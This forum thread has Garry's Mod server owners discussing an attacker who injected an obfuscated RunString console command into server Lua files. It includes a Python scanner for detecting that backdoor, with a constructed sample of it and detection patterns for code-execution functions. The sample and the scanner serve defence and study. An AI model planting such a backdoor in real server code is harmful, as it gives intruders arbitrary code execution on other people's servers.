In the past few months my server has been repeatedly injected with files that add a command that allows RunString(). Most recently lua/includes/modules/usermessage.lua had a line added that created a concommand with RunString in it. My server is not shared, and has no vulnerabilities that I know of.
I thought I would share, because this may help other server owners find out the source of their problems. I don't, unfortunately, know the vector of attack.
Here is the attacker's information so far, if you are curious:
[url]http://pastebin.com/raw.php?i=UEAU1fbe[/url]
Could it be something that was added with the lua_run exploit?
The lua_run thing was a red herring; I don't think it was an issue despite how that thread got some attention. I was basically making a routine batch search of RunString and came across it; it didn't occur to me that it was supposed to be included in the base gamemode.
This, however, is obviously malicious: commands added to pre-existing Lua files that allow arbitrary Lua code to be run. Sometimes they add a new file in lua/autorun, sometimes they just modify already existing files.
Could you be more specific about what exactly you know.
Like, give us information on what he did try to run, what addons or scripts you're running, if any at all (vanilla GMod), and if you have any clues as a victim how this has been done. You say that you don't know how this was done, but at the same time you give us information about the attacker, so how did you find out that it was this user who was behind the attacks?
The attacker usually does interesting stuff like play music via HTML panels, spawn zombies, etc. We could tell it was him because he would go AFK each time before something happened. Each time he was probably looking for music to play, or preparing to run the next piece of Lua. We could eventually tell he had two accounts because of the same IP. He changes IP regularly though. I have wiremod, ULX, and some other minor scripts, nothing out of the ordinary.
Yes, I am almost 100% sure it is that person because they've managed to unban themselves several times, and they are on the server EVERY time this happens. Basically he would just jump around for a while, and as soon as someone requested music he'd go AFK; as soon as the music started playing he'd start moving around again. And of course after both of his accounts were banned, it stopped.
Here is a video, it's a bit amusing:
[URL]http://s95.photobucket.com/albums/l137/pipedude/?action=view&current=hl22011-04-1714-23-00-26.mp4[/URL]
I have no zombie mods on the server, etc. He is most definitely using the command that was somehow uploaded onto the server into a lua file.
EDIT: and no, the video in the file was not added afterwards, the attacker was actually playing it through an HTML panel.
Can you paste here the code he's been adding to your Luas?
Also give us the full list of addons and modules. Natively, GMod Lua should not be able to write any files other than txt, even though some flaws are known to exist which allow writing other types of files, but they're not Lua related.
The fact that he's playing music on the server can be something like advanced manipulation of the door tool or such; what worries me is the ability to write files. This would mean there's more to this than just badly written Luas.
If we get to know what methods he's most likely to use, we can maybe come up with a way to prevent the next attack and capture whatever information he tried to run in order to do the preparation work.
If someone can run Lua on your server, they could just be using an HTML panel to play music. I don't see what a door tool has to do with it. I have no custom modules.
Since you said yourself that you can't do this with Lua, then I don't see the point in telling you what addons I have. The only major ones are wiremod and ulx.
I don't have samples readily available, but he obfuscates the console command by using character codes to name the command. It's basically just a ConCommand that does RunString on the parameter. If you know anything about Lua you'd understand.
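The pattern described above (a concommand whose name is built from character codes and whose callback passes its argument to RunString) can be hunted for mechanically rather than by a plain text search. The scanner below is an added example, not code from this thread or from the server owner: it decodes string.char(...) literals, finds each concommand.Add call, and flags those whose body calls RunString, RunStringEx or CompileString. The sample Lua is constructed for illustration, and the command name "_rs" in it is invented; the parenthesis matching is naive and does not account for parentheses inside Lua string literals.

```python
"""Scan Garry's Mod Lua files for the RunString-concommand backdoor pattern.

Added example (not from the thread).  Looks for concommand.Add(...) calls
whose callback hands text to RunString / RunStringEx / CompileString, and
decodes string.char(...) so that obfuscated command names are reported in
the clear.
"""
import re
from pathlib import Path

# Functions that turn a string into executable Lua on the server.
EXEC_FUNCS = ("RunStringEx", "RunString", "CompileString")

# string.char(95, 114, 115) -> captures "95, 114, 115"
STRING_CHAR_RE = re.compile(r"string\.char\s*\(\s*([\d\s,]+)\)")

# Start of a concommand.Add( call; the trailing \( is the opening paren.
CONCOMMAND_RE = re.compile(r"concommand\.Add\s*\(")

# Command name as a plain string literal right after the opening paren.
NAME_RE = re.compile(r"concommand\.Add\s*\(\s*(?:\"([^\"]*)\"|'([^']*)')")

# Constructed sample: one benign command and one obfuscated backdoor.
SAMPLE_LUA = """\
-- benign: a normal concommand
concommand.Add("ulx_hello", function(ply, cmd, args)
    print("hello")
end)

-- obfuscated backdoor appended to an existing module file
concommand.Add(string.char(95, 114, 115), function(ply, cmd, args)
    RunString(table.concat(args, " "))
end)
"""


def decode_string_char(text):
    """Replace every string.char(...) literal with the quoted string it builds."""
    def repl(m):
        codes = [int(c) for c in m.group(1).split(",") if c.strip()]
        return '"' + "".join(chr(c) for c in codes) + '"'
    return STRING_CHAR_RE.sub(repl, text)


def _balanced_call(text, start, open_idx):
    """Return text[start:] up to the ')' that closes the paren at open_idx.

    Naive: does not skip parentheses inside Lua strings or comments.
    """
    depth = 0
    for j in range(open_idx, len(text)):
        if text[j] == "(":
            depth += 1
        elif text[j] == ")":
            depth -= 1
            if depth == 0:
                return text[start:j + 1]
    return text[start:]


def find_backdoors(lua_source):
    """Return a list of {line, command, exec} for suspicious concommand.Add calls."""
    # Decode first; a decoded string.char contains no newline unless code 10
    # was used, so line numbers still match the original file.
    decoded = decode_string_char(lua_source)
    findings = []
    for m in CONCOMMAND_RE.finditer(decoded):
        call = _balanced_call(decoded, m.start(), m.end() - 1)
        used = [f for f in EXEC_FUNCS if re.search(r"\b%s\s*\(" % f, call)]
        if not used:
            continue
        nm = NAME_RE.match(call)
        name = (nm.group(1) or nm.group(2)) if nm else "<dynamic>"
        findings.append({
            "line": decoded.count("\n", 0, m.start()) + 1,
            "command": name,
            "exec": used[0],
        })
    return findings


def scan_tree(root):
    """Scan every *.lua under root (e.g. garrysmod/lua) and return findings by file."""
    results = {}
    for path in Path(root).rglob("*.lua"):
        hits = find_backdoors(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            results[str(path)] = hits
    return results


def demo():
    """Run the scanner over the constructed sample."""
    return find_backdoors(SAMPLE_LUA)


if __name__ == "__main__":
    for hit in demo():
        print("line %(line)d: concommand %(command)r calls %(exec)s" % hit)
```

Run scan_tree("garrysmod/lua") on a server install to get findings keyed by file path; a hit in a stock file such as lua/includes/modules/usermessage.lua is a strong sign the file was tampered with, since the base game does not register concommands that RunString their arguments.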
[QUOTE=infinitywrai;29858657]If someone can run Lua on your server, they could just be using an HTML panel to play music. I don't see what a door tool has to do with it. I have no custom modules.
Since you said yourself that you can't do this with Lua, then I don't see the point in telling you what addons I have. The only major ones are wiremod and ulx.
I don't have samples readily available, but he obfuscates the console command by using character codes to name the command. It's basically just a ConCommand that does RunString on the parameter. If you know anything about Lua you'd understand.[/QUOTE]
I can't really help you if you're being mysterious about everything.
"Dude this guy did some stuff, help!"
"Well, what'd he do?"
"I can't tell you just help me!"
-_-
[QUOTE=Deprehensio;29859160]"Dude this guy did some stuff, help!"
"Well, what'd he do?"
"I can't tell you just help me!"
-_-[/QUOTE]
Quoted for justice.
Okay, we've got a flaw, an exploit and the exploiter.
The flaw is either:
A) Known.
B) Unknown.
Since we don't know what it is, it's unknown until proven otherwise. There are plenty of possibilities, and as I said, GMod Lua doesn't natively have the possibility of writing things onto your server. File writing is restricted to the data folder, and the file type is restricted to txt. This means either there's some addon on your server which allows this, or there's something new. Either way, we need the information on what your server is running in order to create similar conditions to look into it.
Running commands on servers isn't anything new; as I already said, there are tools, scripts and addons which have flaws and thus allow creating dangerous entities or running commands. Again, we need information to solve this. When we have the information, and if we can't figure out what flaw he's using, we can still use the simulated environment to try to penetrate the security.
Now, you said you're unable to ban him. If you help us solve this problem I will aid you with permanently keeping him off the server regardless of his IP / ID.